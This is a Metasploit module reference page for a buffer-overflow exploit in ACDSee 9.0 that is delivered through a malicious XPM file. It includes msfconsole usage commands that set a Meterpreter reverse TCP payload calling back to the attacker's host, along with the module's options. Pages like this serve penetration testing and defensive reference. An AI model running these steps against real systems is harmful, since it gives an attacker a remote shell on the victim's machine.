Browse Exploit & Auxiliary Modules

The Metasploit Project hosts the world's largest database of quality assured exploits, including hundreds of remote exploits, auxiliary modules, and payloads. You can even review the Metasploit Framework source code of any module - or write your own.

Search for modules

Open Source Vulnerability DataBase ID
Bugtraq ID
Full Text Search
Common Vulnerabilities Exposures ID
Microsoft Security Bulletin ID
 
Search Modules

ACDSee XPM File Section Buffer Overflow

This module exploits a buffer overflow in ACDSee 9.0. When viewing a malicious XPM file with the ACDSee product, a remote attacker could overflow a buffer and execute arbitrary code.


Rank

  • Good

Authors

  • MC < mc [at] metasploit.com >

References


Exploit Targets

  • 0 - ACDSee 9.0 (Build 1008) (default)

Development


Similar Modules


Usage Information

$ msfconsole

                ##                          ###           ##    ##
 ##  ##  #### ###### ####  #####   #####    ##    ####        ######
####### ##  ##  ##  ##         ## ##  ##    ##   ##  ##   ###   ##
####### ######  ##  #####   ####  ##  ##    ##   ##  ##   ##    ##
## # ##     ##  ##  ##  ## ##      #####    ##   ##  ##   ##    ##
##   ##  #### ###   #####   #####     ##   ####   ####   #### ###
                                      ##

msf > use exploit/windows/fileformat/acdsee_xpm
msf exploit(acdsee_xpm) > show payloads
msf exploit(acdsee_xpm) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(acdsee_xpm) > set LHOST [MY IP ADDRESS]
msf exploit(acdsee_xpm) > exploit


Module Options

FILENAME The file name. (default: msf.xpm)
ContextInformationFile The information file that contains context information
DisablePayloadHandler Disable the handler code for the selected payload
DynamicSehRecord Generate a dynamic SEH record (more stealthy)
EnableContextEncoding Use transient context when encoding payloads
VERBOSE Enable detailed status messages
WORKSPACE Specify the workspace for this module
WfsDelay Additional delay when waiting for a session